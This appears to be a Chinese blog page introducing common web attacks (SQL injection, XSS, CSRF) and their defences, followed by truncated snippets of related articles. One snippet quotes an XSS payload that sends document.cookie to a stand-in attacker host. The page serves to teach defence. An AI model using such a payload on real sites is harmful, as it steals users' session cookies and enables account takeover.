常见的web攻击

1. sql注入:
    在sql语句中,如果存在‘--‘字符,则执行sql语句时会注释掉--字符后面的内容。凡有SQL注入漏洞的程序,都是因为程序要接受来自客户端用户输入的变量或URL传递的参数,并且这个变量或参数是组成SQL语句的一部分。
      危害:
          1.非法读取、篡改、删除数据
          2.盗取用户的各类敏感信息,获取利益
          3.通过修改数据库来修改页面上的内容
          4.注入木马等等
    
      防止方式有:
          1.使用预编译绑定变量的SQL语句 如execute()
          2.严格加密处理用户的机密信息
          3.不要随意开启生产环境中Webserver的错误显示
          4.使用正则表达式过滤传入的参数
          5.字符串过滤
          6.检查是否包函非法字符    
        
    2. xss攻击:xss跨站脚本攻击(Cross Site Scripting)
      危害:
          1.盗取各类用户账号,如用户网银账户,各类管理员账号
          2.盗取企业重要的具有商业价值的资料
          3.非法转账
          4.控制受害人机器向其他网站发起攻击、注入木马等
        
      流程:
          受害者向服务器发送url请求,服务器返回数据
          黑客发现服务器存在了漏洞

  防范:
          1.代码里要对用户输入的地方和变量都需要仔细检查长度和对‘<‘,‘>‘, ‘ ; ‘, " ‘ "等字符做过滤
          2.避免直接在cookie中泄露用户隐私,例如email、密码等信息,通过cookie和系统ip绑定来降低cookie泄漏后的危险
          3.尽量采用POST而非GET提交表单

3. CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。
    
      发送随机字符串,进行校验,

   csrf放在了process_view里边
              @csrf_exempt(免除认证)
              @csrf_protect(需要认证)

   危害:
          1.以你的名义发送邮件
          2.盗取你的账号
          3.购买商品
          4.虚拟货币转账
    
     原理:

原文地址:https://www.cnblogs.com/chitalu/p/9194718.html

时间: 2024-10-08 21:31:22

常见的web攻击的相关文章

web前端安全——常见的web攻击方法

面试题:你所了解的web攻击? 1.xss攻击 2.CSRF攻击 3.网络劫持攻击 4.控制台注入代码 5.钓鱼 6.DDoS攻击 7.SQL注入攻击 8.点击劫持 一.xss攻击 XSS攻击:跨站脚本攻击(Cross-Site Scripting),攻击目标是为了盗取存储在客户端的cookie或者其他网站用于识别客户端身份的敏感信息.一旦获取到合法用户的信息后,攻击者甚至可以假冒合法用户与网站进行交互. 防御方法:过滤特殊字符,HttpOnly 浏览器禁止页面的JS访问带有HttpOnly属性

常见的web攻击手段

XSS:跨站脚本攻击 -典型实例为: 当用户在表达输入一段数据后,提交给服务端进行持久化.如果此用户输入的是一段脚本语言,而服务端 用户输入的数据没有经过转码.校验等就存入了数据库,在其他页面需要展示此数据时,就会执行此用户输入的语言.简单来说,JS的强大不用我来解释吧 -推荐防御措施: 对用户输入的信息进行转义,例如<>'等等特殊字符.当然,其实很多前端框架也支持这么做,快查一查你使用的框架支持么. CRSF:跨站请求伪造 -典型实例为: 如果A银行存在CRSF漏洞,有用户在登陆完A银行后没

常见的web攻击及其防御

一.XSS(跨站脚本攻击) 攻击者在 Web 页面中插入恶意脚本,当用户浏览页面时,促使脚本执行,从而达到攻击目的 解决方式: 1.从客户端和服务器端双重验证所有的输入数据,这一般能阻挡大部分注入的脚本 2.对所有的数据进行适当的编码 3.设置 HTTP Header: "X-XSS-Protection: 1" 二.DDos分布式拒绝服务 发送大量请求,使服务器瘫痪 解决方式: 1.检测技术,检测网站是否正在遭受 DDoS 攻击 2.清洗技术,清洗掉异常流量. 三.CSRF跨站请求伪

利用 ASP.NET 的内置功能抵御 Web 攻击 (1)

摘要: Dino 总结了最常见的 Web 攻击类型,并介绍了 Web 开发人员可以如何使用 ASP.NET 的内置功能来改进安全性. 一.ASP.NET 开发人员应当始终坚持的做法 如果您正在阅读本文,可能就不需要再向您灌输 Web 应用程序中的安全性愈来愈重要这一事实了.您需要的可能是一些有关如何在 ASP.NET 应用程序中实现安全性的实际建议.坏消息是,没有任何开发平台 — 包括 ASP.NET在内 — 能够保证一旦采用了该平台,您就能够编写百分百安全的代码.谁要是这么说,一准在撒谎.好消

【转】常见六大Web 安全攻防解析

原文转自:https://segmentfault.com/a/1190000018073845 作者:浪里行舟 在互联网时代,数据安全与个人隐私受到了前所未有的挑战,各种新奇的攻击技术层出不穷.如何才能更好地保护我们的数据?本文主要侧重于分析几种常见的攻击的类型以及防御的方法. 一.XSS XSS (Cross-Site Scripting),跨站脚本攻击,因为缩写和 CSS重叠,所以只能叫 XSS.跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或Java

常见六大Web安全攻防解析

一.XSSXSS (Cross-Site Scripting),跨站脚本攻击,因为缩写和 CSS重叠,所以只能叫 XSS.跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击. 跨站脚本攻击有可能造成以下影响: 利用虚假输入表单骗取用户个人信息.利用脚本窃取用户的Cookie值,被害者在不知情的情况下,帮助攻击者发送恶意请求.显示伪造的文章或图片.XSS 的原理是恶意攻击者往 Web 页面里插入恶意可执行网页脚本代码,当用户浏览

常见的web安全问题总结

we安全对于web前端从事人员也是一个特别重要的一个知识点,也是面试的时候,面试官经常问的安全前端问题.掌握一些web安全知识,提供安全防范意识,今天就会从几个方面说起前端web攻击和防御的常用手段 常见的web攻击方式 1.XSS XSS(Cross Site Scripting)跨站脚本攻击,因为缩写和css重叠,所以能叫XSS,跨脚本攻击是指通过存在安全漏洞的web网站注册用户的浏览器内非法的非本站点HTML标签或javascript进行一种攻击. 跨站脚本攻击有可能造成以下影响 1.利用

总结几种常见web攻击手段及其防御方式

本文简单介绍几种常见的攻击手段及其防御方式 XSS(跨站脚本攻击) CSRF(跨站请求伪造) SQL注入 DDOS web安全系列目录 总结几种常见web攻击手段极其防御方式 总结几种常见的安全算法 XSS 概念 全称是跨站脚本攻击(Cross Site Scripting),指攻击者在网页中嵌入恶意脚本程序. 案列 比如说我写了一个博客网站,然后攻击者在上面发布了一个文章,内容是这样的 <script>window.open("www.gongji.com?param="

总结几种常见web攻击手段极其防御方式

本文简单介绍几种常见的攻击手段及其防御方式 XSS(跨站脚本攻击) CSRF(跨站请求伪造) SQL注入 总结几种常见web攻击手段极其防御方式 XSS 概念 全称是跨站脚本攻击(Cross Site Scripting),指攻击者在网页中嵌入恶意脚本程序. 案列 比如说我写了一个博客网站,然后攻击者在上面发布了一个文章,内容是这样的 <script>window.open("www.gongji.com?param="+document.cookie)</scrip